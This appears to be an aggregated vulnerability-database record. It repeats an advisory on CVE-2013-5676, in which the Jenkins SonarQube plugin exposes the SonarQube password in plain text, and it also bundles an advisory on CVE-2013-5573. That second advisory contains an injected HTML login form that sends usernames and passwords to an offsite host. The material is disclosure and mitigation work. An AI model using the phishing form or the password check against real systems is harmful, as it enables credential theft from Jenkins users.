ID PACKETSTORM:138333 Type packetstorm Reporter Christian Catalano Modified 2016-08-13T00:00:00
Description
`###################################################
1. ### Advisory Information ###
Title: SonarQube Jenkins Plugin - Plain Text Password
Date published: 2013-12-05
Date of last update: 2013-12-05
Vendors contacted : SonarQube and Jenkins CI
Discovered by: Christian Catalano
Severity: High
2. ### Vulnerability Information ###
CVE reference: CVE-2013-5676
CVSS v2 Base Score: 9.0
CVSS v2 Vector: (AV:N/AC:L/Au:S/C:C/I:C/A:C)
Component/s: Jenkins SonarQube Plugin
Class: plain text password
3. ### Introduction ###
Jenkins CI is an extendable open source continuous integration server
http://jenkins-ci.org.
Jenkins SonarQube Plugin allows you to trigger SonarQube analysis from
Jenkins CI using either a:
- Build step to trigger the analysis with the SonarQube Runner
- Post-build action to trigger the analysis with Maven
http://docs.codehaus.org/display/SONAR/Jenkins+Plugin
4. ### Vulnerability Description ###
The default installation and configuration of Jenkins SonarQube Plugin
in Jenkins CI is prone to a security vulnerability.
This vulnerability could be exploited by a remote attacker (a jenkins
malicious user with Manage Jenkins enabled) to obtain the SonarQube's
credentials.
5. ### Technical Description / Proof of Concept Code ###
Below is a harmless test that can be executed to check if a Jenkins
SonarQube Plugin installation is vulnerable.
Using a browser with a web proxy go to the following URL:
https://jenkinsserver:9444/jenkins/configure
check the parameter "sonar.sonarPassword" in Sonar installations section.
A vulnerable installation will show the password in plain text.
6. ### Business Impact ###
An attacker (a jenkins malicious user with Manage Jenkins enabled) can
obtain the SonarQube's credentials.
7. ### Systems Affected ###
This vulnerability was tested against:
Jenkins CI v1.523 and SonarQube Plugin v3.7
Older versions are probably affected too, but they were not checked.
8. ### Vendor Information, Solutions and Workarounds ###
There is the ability to encrypt the "sonar.password" property with the
SonarQube encryption mechanism:
http://docs.codehaus.org/display/SONAR/Settings+Encryption
The sonar.password property is only encryptable since SonarQube v3.7
9. ### Credits ###
This vulnerability has been discovered by:
Christian Catalano aka wastasy ch(dot)catalano(at)gmail(dot)com
10. ### Vulnerability History ###
August 21th, 2013: Vulnerability identification
September 4th, 2013: Vendor notification [Jenkins CI]
November 19th, 2013: Vulnerability confirmation [Jenkins CI]
November 29th, 2013: Vendor notification [SonarQube]
December 2nd, 2013: Vendor solution [SonarQube]
December 6th, 2013: Vulnerability disclosure
11. ### Disclaimer ###
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or misuse of
this information.
###################################################
`
{"id": "PACKETSTORM:138333", "type": "packetstorm", "bulletinFamily": "exploit", "title": "SonarQube Jenkins Password Disclosure", "description": "", "published": "2016-08-13T00:00:00", "modified": "2016-08-13T00:00:00", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/", "score": 4.0}, "href": "https://packetstormsecurity.com/files/138333/SonarQube-Jenkins-Password-Disclosure.html", "reporter": "Christian Catalano", "references": [], "cvelist": ["CVE-2013-5676"], "lastseen": "2016-12-05T22:17:45", "viewCount": 9, "enchantments": {"score": {"value": 5.1, "vector": "NONE", "modified": "2016-12-05T22:17:45", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-5676"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:964D0BD579E8B6643378BDB3FAC7F3BF"]}, {"type": "exploitdb", "idList": ["EDB-ID:30409"]}, {"type": "seebug", "idList": ["SSV:83804"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:30204"]}], "modified": "2016-12-05T22:17:45", "rev": 2}, "vulnersScore": 5.1}, "sourceHref": "https://packetstormsecurity.com/files/download/138333/sonarqube-disclose.txt", "sourceData": "`################################################### \n \n \n1. ### Advisory Information ### \n \nTitle: SonarQube Jenkins Plugin - Plain Text Password \nDate published: 2013-12-05 \nDate of last update: 2013-12-05 \nVendors contacted : SonarQube and Jenkins CI \nDiscovered by: Christian Catalano \nSeverity: High \n \n \n2. ### Vulnerability Information ### \n \nCVE reference: CVE-2013-5676 \nCVSS v2 Base Score: 9.0 \nCVSS v2 Vector: (AV:N/AC:L/Au:S/C:C/I:C/A:C) \nComponent/s: Jenkins SonarQube Plugin \nClass: plain text password \n \n \n3. ### Introduction ### \n \nJenkins CI is an extendable open source continuous integration server \nhttp://jenkins-ci.org. \nJenkins SonarQube Plugin allows you to trigger SonarQube analysis from \nJenkins CI using either a: \n- Build step to trigger the analysis with the SonarQube Runner \n- Post-build action to trigger the analysis with Maven \nhttp://docs.codehaus.org/display/SONAR/Jenkins+Plugin \n \n \n4. ### Vulnerability Description ### \n \nThe default installation and configuration of Jenkins SonarQube Plugin \nin Jenkins CI is prone to a security vulnerability. \nThis vulnerability could be exploited by a remote attacker (a jenkins \nmalicious user with Manage Jenkins enabled) to obtain the SonarQube's \ncredentials. \n \n \n5. ### Technical Description / Proof of Concept Code ### \n \nBelow is a harmless test that can be executed to check if a Jenkins \nSonarQube Plugin installation is vulnerable. \nUsing a browser with a web proxy go to the following URL: \n \nhttps://jenkinsserver:9444/jenkins/configure \n \ncheck the parameter \"sonar.sonarPassword\" in Sonar installations section. \nA vulnerable installation will show the password in plain text. \n \n \n6. ### Business Impact ### \n \nAn attacker (a jenkins malicious user with Manage Jenkins enabled) can \nobtain the SonarQube's credentials. \n \n \n7. ### Systems Affected ### \n \nThis vulnerability was tested against: \nJenkins CI v1.523 and SonarQube Plugin v3.7 \nOlder versions are probably affected too, but they were not checked. \n \n \n8. ### Vendor Information, Solutions and Workarounds ### \n \nThere is the ability to encrypt the \"sonar.password\" property with the \nSonarQube encryption mechanism: \nhttp://docs.codehaus.org/display/SONAR/Settings+Encryption \nThe sonar.password property is only encryptable since SonarQube v3.7 \n \n \n9. ### Credits ### \n \nThis vulnerability has been discovered by: \nChristian Catalano aka wastasy ch(dot)catalano(at)gmail(dot)com \n \n \n10. ### Vulnerability History ### \n \nAugust 21th, 2013: Vulnerability identification \nSeptember 4th, 2013: Vendor notification [Jenkins CI] \nNovember 19th, 2013: Vulnerability confirmation [Jenkins CI] \nNovember 29th, 2013: Vendor notification [SonarQube] \nDecember 2nd, 2013: Vendor solution [SonarQube] \nDecember 6th, 2013: Vulnerability disclosure \n \n \n11. ### Disclaimer ### \n \nThe information contained within this advisory is supplied \"as-is\" with \nno warranties or guarantees of fitness of use or otherwise. \nI accept no responsibility for any damage caused by the use or misuse of \nthis information. \n \n################################################### \n`\n", "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T06:06:58", "description": "The Jenkins Plugin for SonarQube 3.7 and earlier allows remote authenticated users to obtain sensitive information (cleartext passwords) by reading the value in the sonar.sonarPassword parameter from jenkins/configure.", "edition": 6, "cvss3": {}, "published": "2013-12-13T18:55:00", "title": "CVE-2013-5676", "type": "cve", "cwe": ["CWE-310"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5676"], "modified": "2013-12-16T17:16:00", "cpe": ["cpe:/a:sonarsource:jenkins_plugin:-"], "id": "CVE-2013-5676", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5676", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:sonarsource:jenkins_plugin:-:-:-:*:-:sonarqube:*:*"]}], "exploitdb": [{"lastseen": "2016-02-03T12:19:36", "description": "SonarQube Jenkins Plugin - Plain Text Password. CVE-2013-5676. Webapps exploit for php platform", "published": "2013-12-18T00:00:00", "type": "exploitdb", "title": "SonarQube Jenkins Plugin - Plain Text Password", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-5676"], "modified": "2013-12-18T00:00:00", "id": "EDB-ID:30409", "href": "https://www.exploit-db.com/exploits/30409/", "sourceData": "###################################################\r\n\r\n1. ### Advisory Information ###\r\n\r\nTitle: SonarQube Jenkins Plugin - Plain Text Password\r\nDate published: 2013-12-05\r\nDate of last update: 2013-12-05\r\nVendors contacted: SonarQube and Jenkins CI\r\nDiscovered by: Christian Catalano\r\nSeverity: High\r\n\r\n\r\n2. ### Vulnerability Information ###\r\n\r\nCVE reference : CVE-2013-5676\r\nCVSS v2 Base Score: 9.0\r\nCVSS v2 Vector : (AV:N/AC:L/Au:S/C:C/I:C/A:C)\r\nComponent/s : Jenkins SonarQube Plugin\r\nClass : plain text password\r\n\r\n\r\n3. ### Introduction ###\r\n\r\nJenkins CI is an extendable open source continuous integration server\r\nhttp://jenkins-ci.org.\r\n\r\nJenkins SonarQube Plugin allows you to trigger SonarQube analysis\r\nfrom Jenkins CI using either a:\r\n\r\n- Build step to trigger the analysis with the SonarQube Runner\r\n- Post-build action to trigger the analysis with Maven\r\n\r\nhttp://docs.codehaus.org/display/SONAR/Jenkins+Plugin\r\n\r\n\r\n4. ### Vulnerability Description ###\r\n\r\nThe default installation and configuration of Jenkins SonarQube Plugin\r\nin Jenkins CI is prone to a security vulnerability.\r\n\r\nThis vulnerability could be exploited by a remote attacker (a jenkins\r\nmalicious user with Manage Jenkins enabled) to obtain the SonarQube's\r\ncredentials.\r\n\r\n\r\n5. ### Technical Description / Proof of Concept Code ###\r\n\r\nBelow is a harmless test that can be executed to check if a Jenkins\r\nSonarQube Plugin installation is vulnerable.\r\n\r\nUsing a browser with a web proxy go to the following URL:\r\n\r\nhttps://jenkinsserver:9444/jenkins/configure\r\n\r\ncheck the parameter \"sonar.sonarPassword\" in Sonar installations section.\r\n\r\nA vulnerable installation will show the password in plain text.\r\n\r\n\r\n6. ### Business Impact ###\r\n\r\nAn attacker (a jenkins malicious user with Manage Jenkins enabled) can\r\nobtain the SonarQube's credentials.\r\n\r\n\r\n7. ### Systems Affected ###\r\n\r\nThis vulnerability was tested against:\r\nJenkins CI v1.523 and SonarQube Plugin v3.7\r\nOlder versions are probably affected too, but they were not checked.\r\n\r\n\r\n8. ### Vendor Information, Solutions and Workarounds ###\r\n\r\nThere is the ability to encrypt the \"sonar.password\" property with the\r\nSonarQube encryption mechanism:\r\n\r\nhttp://docs.codehaus.org/display/SONAR/Settings+Encryption\r\n\r\nThe sonar.password property is only encryptable since SonarQube v3.7\r\n\r\n\r\n9. ### Credits ###\r\n\r\nThis vulnerability has been discovered by:\r\nChristian Catalano aka wastasy ch(dot)catalano(at)gmail(dot)com\r\n\r\n\r\n10. ### Vulnerability History ###\r\n\r\nAugust 21th, 2013: Vulnerability identification\r\nSeptember 4th, 2013: Vendor notification [Jenkins CI]\r\nNovember 19th, 2013: Vulnerability confirmation [Jenkins CI]\r\nNovember 29th, 2013: Vendor notification [SonarQube]\r\nDecember 2nd, 2013: Vendor solution [SonarQube]\r\nDecember 6th, 2013: Vulnerability disclosure\r\n\r\n\r\n11. ### Disclaimer ###\r\n\r\nThe information contained within this advisory is supplied \"as-is\"\r\nwith no warranties or guarantees of fitness of use or otherwise.\r\nI accept no responsibility for any damage caused by the use or misuse\r\nof this information.\r\n\r\n###################################################\r\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/30409/"}], "seebug": [{"lastseen": "2017-11-19T14:49:59", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "SonarQube Jenkins Plugin - Plain Text Password", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-5676"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-83804", "id": "SSV:83804", "sourceData": "\n ###################################################\r\n\r\n1. ### Advisory Information ###\r\n\r\nTitle: SonarQube Jenkins Plugin - Plain Text Password\r\nDate published: 2013-12-05\r\nDate of last update: 2013-12-05\r\nVendors contacted: SonarQube and Jenkins CI\r\nDiscovered by: Christian Catalano\r\nSeverity: High\r\n\r\n\r\n2. ### Vulnerability Information ###\r\n\r\nCVE reference : CVE-2013-5676\r\nCVSS v2 Base Score: 9.0\r\nCVSS v2 Vector : (AV:N/AC:L/Au:S/C:C/I:C/A:C)\r\nComponent/s : Jenkins SonarQube Plugin\r\nClass : plain text password\r\n\r\n\r\n3. ### Introduction ###\r\n\r\nJenkins CI is an extendable open source continuous integration server\r\nhttp://jenkins-ci.org.\r\n\r\nJenkins SonarQube Plugin allows you to trigger SonarQube analysis\r\nfrom Jenkins CI using either a:\r\n\r\n- Build step to trigger the analysis with the SonarQube Runner\r\n- Post-build action to trigger the analysis with Maven\r\n\r\nhttp://docs.codehaus.org/display/SONAR/Jenkins+Plugin\r\n\r\n\r\n4. ### Vulnerability Description ###\r\n\r\nThe default installation and configuration of Jenkins SonarQube Plugin\r\nin Jenkins CI is prone to a security vulnerability.\r\n\r\nThis vulnerability could be exploited by a remote attacker (a jenkins\r\nmalicious user with Manage Jenkins enabled) to obtain the SonarQube's\r\ncredentials.\r\n\r\n\r\n5. ### Technical Description / Proof of Concept Code ###\r\n\r\nBelow is a harmless test that can be executed to check if a Jenkins\r\nSonarQube Plugin installation is vulnerable.\r\n\r\nUsing a browser with a web proxy go to the following URL:\r\n\r\nhttps://jenkinsserver:9444/jenkins/configure\r\n\r\ncheck the parameter "sonar.sonarPassword" in Sonar installations section.\r\n\r\nA vulnerable installation will show the password in plain text.\r\n\r\n\r\n6. ### Business Impact ###\r\n\r\nAn attacker (a jenkins malicious user with Manage Jenkins enabled) can\r\nobtain the SonarQube's credentials.\r\n\r\n\r\n7. ### Systems Affected ###\r\n\r\nThis vulnerability was tested against:\r\nJenkins CI v1.523 and SonarQube Plugin v3.7\r\nOlder versions are probably affected too, but they were not checked.\r\n\r\n\r\n8. ### Vendor Information, Solutions and Workarounds ###\r\n\r\nThere is the ability to encrypt the "sonar.password" property with the\r\nSonarQube encryption mechanism:\r\n\r\nhttp://docs.codehaus.org/display/SONAR/Settings+Encryption\r\n\r\nThe sonar.password property is only encryptable since SonarQube v3.7\r\n\r\n\r\n9. ### Credits ###\r\n\r\nThis vulnerability has been discovered by:\r\nChristian Catalano aka wastasy ch(dot)catalano(at)gmail(dot)com\r\n\r\n\r\n10. ### Vulnerability History ###\r\n\r\nAugust 21th, 2013: Vulnerability identification\r\nSeptember 4th, 2013: Vendor notification [Jenkins CI]\r\nNovember 19th, 2013: Vulnerability confirmation [Jenkins CI]\r\nNovember 29th, 2013: Vendor notification [SonarQube]\r\nDecember 2nd, 2013: Vendor solution [SonarQube]\r\nDecember 6th, 2013: Vulnerability disclosure\r\n\r\n\r\n11. ### Disclaimer ###\r\n\r\nThe information contained within this advisory is supplied "as-is"\r\nwith no warranties or guarantees of fitness of use or otherwise.\r\nI accept no responsibility for any damage caused by the use or misuse\r\nof this information.\r\n\r\n###################################################\r\n\n ", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-83804"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:49", "description": "\nSonarQube Jenkins Plugin - Plain Text Password", "edition": 1, "published": "2013-12-18T00:00:00", "title": "SonarQube Jenkins Plugin - Plain Text Password", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-5676"], "modified": "2013-12-18T00:00:00", "id": "EXPLOITPACK:964D0BD579E8B6643378BDB3FAC7F3BF", "href": "", "sourceData": "###################################################\n\n1. ### Advisory Information ###\n\nTitle: SonarQube Jenkins Plugin - Plain Text Password\nDate published: 2013-12-05\nDate of last update: 2013-12-05\nVendors contacted: SonarQube and Jenkins CI\nDiscovered by: Christian Catalano\nSeverity: High\n\n\n2. ### Vulnerability Information ###\n\nCVE reference : CVE-2013-5676\nCVSS v2 Base Score: 9.0\nCVSS v2 Vector : (AV:N/AC:L/Au:S/C:C/I:C/A:C)\nComponent/s : Jenkins SonarQube Plugin\nClass : plain text password\n\n\n3. ### Introduction ###\n\nJenkins CI is an extendable open source continuous integration server\nhttp://jenkins-ci.org.\n\nJenkins SonarQube Plugin allows you to trigger SonarQube analysis\nfrom Jenkins CI using either a:\n\n- Build step to trigger the analysis with the SonarQube Runner\n- Post-build action to trigger the analysis with Maven\n\nhttp://docs.codehaus.org/display/SONAR/Jenkins+Plugin\n\n\n4. ### Vulnerability Description ###\n\nThe default installation and configuration of Jenkins SonarQube Plugin\nin Jenkins CI is prone to a security vulnerability.\n\nThis vulnerability could be exploited by a remote attacker (a jenkins\nmalicious user with Manage Jenkins enabled) to obtain the SonarQube's\ncredentials.\n\n\n5. ### Technical Description / Proof of Concept Code ###\n\nBelow is a harmless test that can be executed to check if a Jenkins\nSonarQube Plugin installation is vulnerable.\n\nUsing a browser with a web proxy go to the following URL:\n\nhttps://jenkinsserver:9444/jenkins/configure\n\ncheck the parameter \"sonar.sonarPassword\" in Sonar installations section.\n\nA vulnerable installation will show the password in plain text.\n\n\n6. ### Business Impact ###\n\nAn attacker (a jenkins malicious user with Manage Jenkins enabled) can\nobtain the SonarQube's credentials.\n\n\n7. ### Systems Affected ###\n\nThis vulnerability was tested against:\nJenkins CI v1.523 and SonarQube Plugin v3.7\nOlder versions are probably affected too, but they were not checked.\n\n\n8. ### Vendor Information, Solutions and Workarounds ###\n\nThere is the ability to encrypt the \"sonar.password\" property with the\nSonarQube encryption mechanism:\n\nhttp://docs.codehaus.org/display/SONAR/Settings+Encryption\n\nThe sonar.password property is only encryptable since SonarQube v3.7\n\n\n9. ### Credits ###\n\nThis vulnerability has been discovered by:\nChristian Catalano aka wastasy ch(dot)catalano(at)gmail(dot)com\n\n\n10. ### Vulnerability History ###\n\nAugust 21th, 2013: Vulnerability identification\nSeptember 4th, 2013: Vendor notification [Jenkins CI]\nNovember 19th, 2013: Vulnerability confirmation [Jenkins CI]\nNovember 29th, 2013: Vendor notification [SonarQube]\nDecember 2nd, 2013: Vendor solution [SonarQube]\nDecember 6th, 2013: Vulnerability disclosure\n\n\n11. ### Disclaimer ###\n\nThe information contained within this advisory is supplied \"as-is\"\nwith no warranties or guarantees of fitness of use or otherwise.\nI accept no responsibility for any damage caused by the use or misuse\nof this information.\n\n###################################################", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:50", "bulletinFamily": "software", "cvelist": ["CVE-2013-5573"], "description": "\r\n\r\n###################################################\r\n\r\n01. ### Advisory Information ###\r\n\r\nTitle: Default markup formatter permits offsite-bound forms\r\nDate published : 2013-12-16\r\nDate of last update: 2013-12-16\r\nVendors contacted : Jenkins CI v 1.523\r\nDiscovered by: Christian Catalano\r\nSeverity: Low\r\n\r\n\r\n02. ### Vulnerability Information ###\r\n\r\nCVE reference: CVE-2013-5573\r\nCVSS v2 Base Score: 4.7\r\nCVSS v2 Vector : (AV:N/AC:L/Au:M/C:P/I:P/A:N)\r\nComponent/s : Jenkins CI v 1.523\r\nClass : HTML Injection\r\n\r\n\r\n03. ### Introduction ###\r\n\r\nJenkins CI is an extendable open source continuous integration server\r\nhttp://jenkins-ci.org.\r\n\r\n\r\n04. ### Vulnerability Description ###\r\n\r\nThe default installation and configuration of Jenkins CI is prone to a\r\nsecurity vulnerability. The Jenkins CI default markup formatter permits\r\noffsite-bound forms. This vulnerability could be exploited by a remote\r\nattacker (a malicious user) to inject malicious persistent HTML script\r\ncode (application side).\r\n\r\n\r\n05. ### Technical Description / Proof of Concept Code ###\r\n\r\nThe vulnerability is located in the 'Descriotion' input field of the\r\nUser Configuration function:\r\n\r\nhttps://localhost:9444/jenkins/user/attacker/configure\r\n\r\nTo reproduce the vulnerability, the attacker (a malicious user) can add\r\nthe malicious HTML script code:\r\n\r\n<form method="POST" action="http://www.mocksite.org/login/login.php.">\r\nUsername: <input type="text" name="username" size="15" /><br />\r\nPassword: <input type="password" name="passwort" size="15" /><br />\r\n<div align="center">\r\n<p><input type="submit" value="Login" /></p>\r\n</div>\r\n</form>\r\n\r\nin the 'Descriotion' input field and click on save button.\r\nThe code execution happens when the victim (an unaware user) view the\r\n'People List'\r\n\r\nhttps://localhost:9444/jenkins/asynchPeople/\r\n\r\nand click on attacker user id.\r\n\r\n\r\n06. ### Business Impact ###\r\n\r\nExploitation of the persistent web vulnerability requires a low\r\nprivilege web application user account.\r\nSuccessful exploitation of the vulnerability results in persistent\r\nphishing and persistent external redirects.\r\n\r\n\r\n07. ### Systems Affected ###\r\n\r\n\r\nThis vulnerability was tested against:\r\nJenkins CI v1.523\r\nOlder versions are probably affected too, but they were not checked.\r\n\r\n\r\n08. ### Vendor Information, Solutions and Workarounds ###\r\n\r\nCurrently, there are no known upgrades or patches to correct this\r\nvulnerability. It is possible to temporarily mitigate the flaw by\r\nimplementing the following workaround:\r\n'MyspacePolicy' permits\r\ntag("form", "action", ONSITE_OR_OFFSITE_URL,\r\n "method");\r\n\r\nFix 'MyspacePolicy' by restricting the policy to ONSITE_URL only or\r\nperhaps <form> could be banned entirely.\r\n\r\n\r\n09. ### Credits ###\r\n\r\nThis vulnerability has been discovered by:\r\nChristian Catalano aka wastasy ch(dot)catalano(at)gmail(dot)com\r\n\r\n\r\n10. ### Vulnerability History ###\r\n\r\nAugust 21th, 2013: Vulnerability identification\r\nAugust 4th, 2013: Vendor notification [Jenkins CI]\r\nNovember 19th, 2013: Vulnerability confirmation [Jenkins CI]\r\nNovember 19th, 2013: Vendor Solution\r\nDecember 16th, 2013: Vulnerability disclosure\r\n\r\n11. ### Disclaimer ###\r\n\r\nThe information contained within this advisory is supplied "as-is" with\r\nno warranties or guarantees of fitness of use or otherwise.\r\nI accept no responsibility for any damage caused by the use or misuse of\r\nthis information.\r\n\r\n###################################################\r\n", "edition": 1, "modified": "2014-01-09T00:00:00", "published": "2014-01-09T00:00:00", "id": "SECURITYVULNS:DOC:30204", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30204", "title": "[CVE-2013-5676] Plain Text Password In SonarQube Jenkins Plugin", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}]}
